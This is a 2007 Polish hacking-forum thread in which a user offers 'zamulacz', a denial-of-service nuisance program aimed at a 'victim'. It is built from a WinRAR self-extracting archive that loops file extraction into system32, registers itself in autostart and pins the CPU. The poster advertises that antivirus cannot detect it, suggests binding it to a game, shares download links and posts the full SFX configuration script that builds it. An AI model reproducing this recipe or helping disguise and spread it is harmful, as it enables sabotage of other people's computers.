Zamulacz v0.1

kokoss

Użytkownik
Dołączył
Czerwiec 21, 2007
Posty
11
Właśnie używając zwykłego WinRara i archiwum sfx stworzyłem zamulacz. Nieoczekiwanie program ten. W nieskończoność rozpakowuje pliki do folderu systemowego. nie nadpisuje ich ale pomija istniejące. Dodaje też skrót w Autostarcie. Użycie procesora - 100%. Sposób na usunięcie - Wejście w tryb awaryjny i usunięcie plików: zamulacz.sfx.exe; zamulacz.exe; zamulacz.txt z C:WINDOWSsystem32 oraz pliku zamulacz.exe z autostartu.
Nie jest wykrywalny przez żadne antywiry (wkońcu zawiera tylko arch sfx i notatnik) i z łatwością można go zbindować z jakąś gierką lub czymś innym. Nie wysyła on żadnych logów itp... Służy tylko do zamulenia i utrudnień w korzystaniu z komputera ofiarze.
Download -> http://www.speedshare.org/JUZvPb4vQ7 / http://download.yousendit.com/43C4E99E6392A7B7
 

amex

Użytkownik
Dołączył
Marzec 11, 2007
Posty
934
o ile sie nie myle to wystarczy kliknac anuluj jak sie bedzie rozpakowywalo... kompletnie bez sensu jak dla mnie... ja bym napisal cos takiego w batchu i by bylo bardziej efektowne i efektywne niz to
 

sAnguis

Użytkownik
Dołączył
Czerwiec 20, 2007
Posty
15
Może i fajne ale i tak nie skorzystam
smile.gif
) moja ocena to : 7.5/10

[ Dodano: 24-06-2007, 11:30 ]
a możesz napisać w czym to pisałeś ?
 

amex

Użytkownik
Dołączył
Marzec 11, 2007
Posty
934
ale jest w tray'u wiec klikasz na ikonke a pozniej anuluj, czyż nie?


Originally posted by sAnguis
Może i fajne ale i tak nie skorzystam
smile.gif
) moja ocena to : 7.5/10

[ Dodano: 24-06-2007, 11:30 ]
a możesz napisać w czym to pisałeś ?
wydaje mi sie ze w niczym tego nie pisal... odpowiedni komentarz do archiwum sfx i gotowe
 

kokoss

Użytkownik
Dołączył
Czerwiec 21, 2007
Posty
11
;Poniższy komentarz zawiera skrypt SFX

Path=C:WINDOWSsystem32
SavePath
Setup=zamulacz.exe
Setup=zamulacz.exe
Silent=1
Overwrite=2
Shortcut=T, "zamulacz.exe", "", "Zamulacz", "Zamulacz"
Shortcut=T, "zamulacz.exe", "", "Zamulacz", "Zamulacz"


/Szczerze to nie patrzałem na ikonki w trayu. Wiem napewno że nie wyłączysz tego w Taskmgr bo zanim klikniesz na jego proces nacisniesz delete i Enter wybrany proces zdarzy sie zakonczyc i wlaczy sie inny proces Zamulacza. Sądze ze z ikonami w Trayu jest tak samo - pojedyńczy proces zamulacza trwa od 0,5 do 0,75sekundy. Zawsze otwarte są jego 2 procesy.
 

mathe888

Użytkownik
Dołączył
Luty 7, 2007
Posty
13
jeśli jest tak jak mówisz to nawet nieżle ci to wyszło ale jakoś niewierze żeby niedało się tego przerwać ;]
 

kokoss

Użytkownik
Dołączył
Czerwiec 21, 2007
Posty
11
Możesz u siebie spróbować. Plik jest czysty a jak odinstalować podałem.

/Po próbach stwierdzam iż:
-Nie pokazuje sie ikonka w Tray-u (pewnie nie zdąża
<
)
-Jeśli nawet usuniemy jeden proces to drugi zaraz się rozmnoży.
-Ja nie umiałem go zamknąć inaczej niż POWER
 

Gigus15

Użytkownik
Dołączył
Lipiec 5, 2007
Posty
7
Ja go pobrałem, nie był to żaden winrar tylko od razu plik .exe.. i na dodatek niemoge go usunąć ani włączyć, nawet nie zdążyłem go włączyć bo juz pokazuje że nie jest prawidłową aplikacją.. [tu ścieżka na pulpit - tam go mam], a usunąć niemoge bo pokazuje że jest używany przez inne programy i żebym je zamknoł, a ja nawet niewiem przez jakie :<
 

Zumzero

Użytkownik
Dołączył
Grudzień 23, 2006
Posty
42
Originally posted by Gigus15
Ja go pobrałem, nie był to żaden winrar tylko od razu plik .exe.. i na dodatek niemoge go usunąć ani włączyć, nawet nie zdążyłem go włączyć bo juz pokazuje że nie jest prawidłową aplikacją.. [tu ścieżka na pulpit - tam go mam], a usunąć niemoge bo pokazuje że jest używany przez inne programy i żebym je zamknoł, a ja nawet niewiem przez jakie :<
Zaresetuj przeglądarke albo kompa i będzia działąc.
 

Gigus15

Użytkownik
Dołączył
Lipiec 5, 2007
Posty
7
Originally posted by Zumzero+--><div class='quotetop'>CYTAT(Zumzero)</div>
<!--QuoteBegin-Gigus15
Ja go pobrałem, nie był to żaden winrar tylko od razu plik .exe.. i na dodatek niemoge go usunąć ani włączyć, nawet nie zdążyłem go włączyć bo juz pokazuje że nie jest prawidłową aplikacją.. [tu ścieżka na pulpit - tam go mam], a usunąć niemoge bo pokazuje że jest używany przez inne programy i żebym je zamknoł, a ja nawet niewiem przez jakie :<
Zaresetuj przeglądarke albo kompa i będzia działąc.[/b]
nie pomogło ;<
 
Do góry Bottom